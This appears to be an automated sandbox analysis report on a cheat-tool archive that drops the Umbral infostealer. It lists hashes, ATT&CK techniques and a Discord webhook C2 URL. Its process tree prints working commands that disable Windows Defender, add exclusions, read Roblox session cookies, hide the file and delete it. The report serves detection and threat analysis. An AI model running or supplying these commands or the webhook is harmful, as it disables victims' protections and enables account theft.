Overview

overview

10

Static

static

3

OblivionCh....1.rar

windows7-x64

10

OblivionCh....1.rar

windows10-2004-x64

1

OblivionCh...s.admx

windows7-x64

3

OblivionCh...s.admx

windows10-2004-x64

3

OblivionCh...er.pdb

windows7-x64

3

OblivionCh...er.pdb

windows10-2004-x64

3

OblivionCh...ui.ini

windows7-x64

1

OblivionCh...ui.ini

windows10-2004-x64

1

OblivionCh...n.json

windows7-x64

3

OblivionCh...n.json

windows10-2004-x64

3

OblivionCh...ingw.h

windows7-x64

3

OblivionCh...ingw.h

windows10-2004-x64

3

OblivionCh...sert.h

windows7-x64

3

OblivionCh...sert.h

windows10-2004-x64

3

OblivionCh...onio.h

windows7-x64

3

OblivionCh...onio.h

windows10-2004-x64

3

OblivionCh...type.h

windows7-x64

3

OblivionCh...type.h

windows10-2004-x64

3

OblivionCh.../dir.h

windows7-x64

3

OblivionCh.../dir.h

windows10-2004-x64

3

OblivionCh...rect.h

windows7-x64

3

OblivionCh...rect.h

windows10-2004-x64

3

OblivionCh...rent.h

windows7-x64

3

OblivionCh...rent.h

windows10-2004-x64

3

OblivionCh.../dos.h

windows7-x64

3

OblivionCh.../dos.h

windows10-2004-x64

3

OblivionCh...rrno.h

windows7-x64

3

OblivionCh...rrno.h

windows10-2004-x64

3

OblivionCh...xcpt.h

windows7-x64

3

OblivionCh...xcpt.h

windows10-2004-x64

3

OblivionCh...cntl.h

windows7-x64

3

OblivionCh...cntl.h

windows10-2004-x64

3

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    14-01-2025 21:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    OblivionCheatVIP 2.1.rar

  • Size

    45.5MB

  • MD5

    e1bdb1bb87c0e037710f6305c54c969a

  • SHA1

    9b9f9848036fb35395e50b515ed45169d6883436

  • SHA256

    f139ed18bca38e4e61fa88f94f0a070d217df1c1f647191510253352724ea1b5

  • SHA512

    d839d93fbf3547f84ea465f6e9423b5d70b70e840c9f2e0df906cb8f483ea58524c5c79f6badb1f9b2df7a0e7b640904ebca488e36a07dc2dd62edf0f74ccc13

  • SSDEEP

    786432:u5r8IfJQOhn0irjgZzaSiI5RTbhVRaqm9hrb/CU0ItR8uZQouD:gRJhhnPruJXByqgPtR8uSD

Score
10/10
umbraldefense_evasiondiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1326623157028913212/jlk5SjJembzYiYsGT0bg_70kMXYfak5GFsTDwPZEZQWRTYI4z_Kz9R6n4WKwU74BXibD

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\OblivionCheatVIP 2.1.rar"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:532
    • C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAYQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAZgBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYgBhACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Users\Admin\AppData\Local\Temp\TestingServer.exe
        "C:\Users\Admin\AppData\Local\Temp\TestingServer.exe"
        3⤵
        • Executes dropped EXE
        PID:2792
      • C:\Users\Admin\AppData\Local\Temp\Node.exe
        "C:\Users\Admin\AppData\Local\Temp\Node.exe"
        3⤵
        • Executes dropped EXE
        PID:3004
      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2660
        • C:\Windows\system32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
          4⤵
          • Views/modifies file attributes
          PID:1956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2956
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1404
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
            PID:2220
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
              PID:820
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1516
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2108
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\svchost.exe" && pause
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of WriteProcessMemory
              PID:1676
              • C:\Windows\system32\PING.EXE
                ping localhost
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:1648
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        1⤵
          PID:1996

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Persistence

        Privilege Escalation

        Defense Evasion

        Hide Artifacts

        1
        T1564

        Hidden Files and Directories

        1
        T1564.001

        Obfuscated Files or Information

        1
        T1027

        Command Obfuscation

        1
        T1027.010

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Remote System Discovery

        1
        T1018

        System Information Discovery

        2
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe
          Filesize

          41.8MB

          MD5

          95a3e8c1d4a5c7bd87a123b5cccb9f67

          SHA1

          152bca2603e39111cc446692d8a29501d980def9

          SHA256

          aa3765a7cfa4a5430c350c0d44252216c215c3fb3ffdf793cbef71dea633bdd8

          SHA512

          8c9663f0f7700dd71475e9bad481e38a1131c636181ca768c4b9016c5e6e233131a37ab5e100b6c071459ef4ee6a7ace6eb22bd671cf5b0c8ded61e6ac8387d1

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\TestingServer.exe
          Filesize

          3.7MB

          MD5

          54980c00c99dd31da947a704034250e4

          SHA1

          0388dcb527b4df85048593fb1fe324461ac2539b

          SHA256

          efe6e5da039480336cc51d61970eb7ca5b0c10bc315c083f3cd08f81fb5fa7e6

          SHA512

          3e2202658a8a44d994a34dfa5ae2b7de4d539713424f6e9047401847e003df6daf06848c405584e2c0ac7f80c421d708caf0b82f6995e720060a2662c18fd20c

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40ILQU3WRTHO5V5KALFR.temp
          Filesize

          7KB

          MD5

          df623a2990c1bead9ff6499b13c2e565

          SHA1

          ecfa639f276f0a55a68b55b611469ab79f47047f

          SHA256

          9c9f2c6f82e48559ff69f25f268eb617053a918cda4494debf5ccd01d7bbfd19

          SHA512

          0e01fc3d81e9a39a36aaf93e2759f8fa650b4afeb98ad413f76819cd48a8093c0d54eede8dc0d737ab15846bb03f1f58c90aa42048107668ee05e846f733a541

          Download Submit

        • \Users\Admin\AppData\Local\Temp\Node.exe
          Filesize

          37.2MB

          MD5

          0596379d69afdfe2534fad7584914d1f

          SHA1

          34cafd2ac2fb94c4981ef903c974e0f463d0a0e8

          SHA256

          6ae88823ed9ebb76bd63babd61b7dfe6ac9168b2284f32f4b657ebe448b742ca

          SHA512

          17d8ab7db5186d3c77e5ff949bd63bd7b5a31a3891cb757340465ad1df308917c939305218b5448db9f109a61702eb054d6182eecdcba1ba2eb268a10568b932

          Download Submit

        • \Users\Admin\AppData\Local\Temp\svchost.exe
          Filesize

          229KB

          MD5

          74a87327b20292e3a514a2edd1f91c2c

          SHA1

          d4a38972946d2a8ce32d375b4781e2f09ecc5368

          SHA256

          7d3e8efdb9cc50120a910f17ed69a6edafd03a6d8ef2765f07e974bab5d6c7a2

          SHA512

          effa857d12d0d955504013525aab1f75bd0e48e958e82b4822ecaab3333176b80c4a107934a11525b791f77f4126cc5db863f841c6cb6c3db3ea679514cb4eec

          Download Submit

        • memory/836-44-0x000000001B7A0000-0x000000001BA82000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/836-45-0x0000000001E70000-0x0000000001E78000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1964-36-0x000000001B810000-0x000000001BAF2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1964-37-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/3068-31-0x0000000001070000-0x00000000010B0000-memory.dmp

          Filesize

          256KB

          Download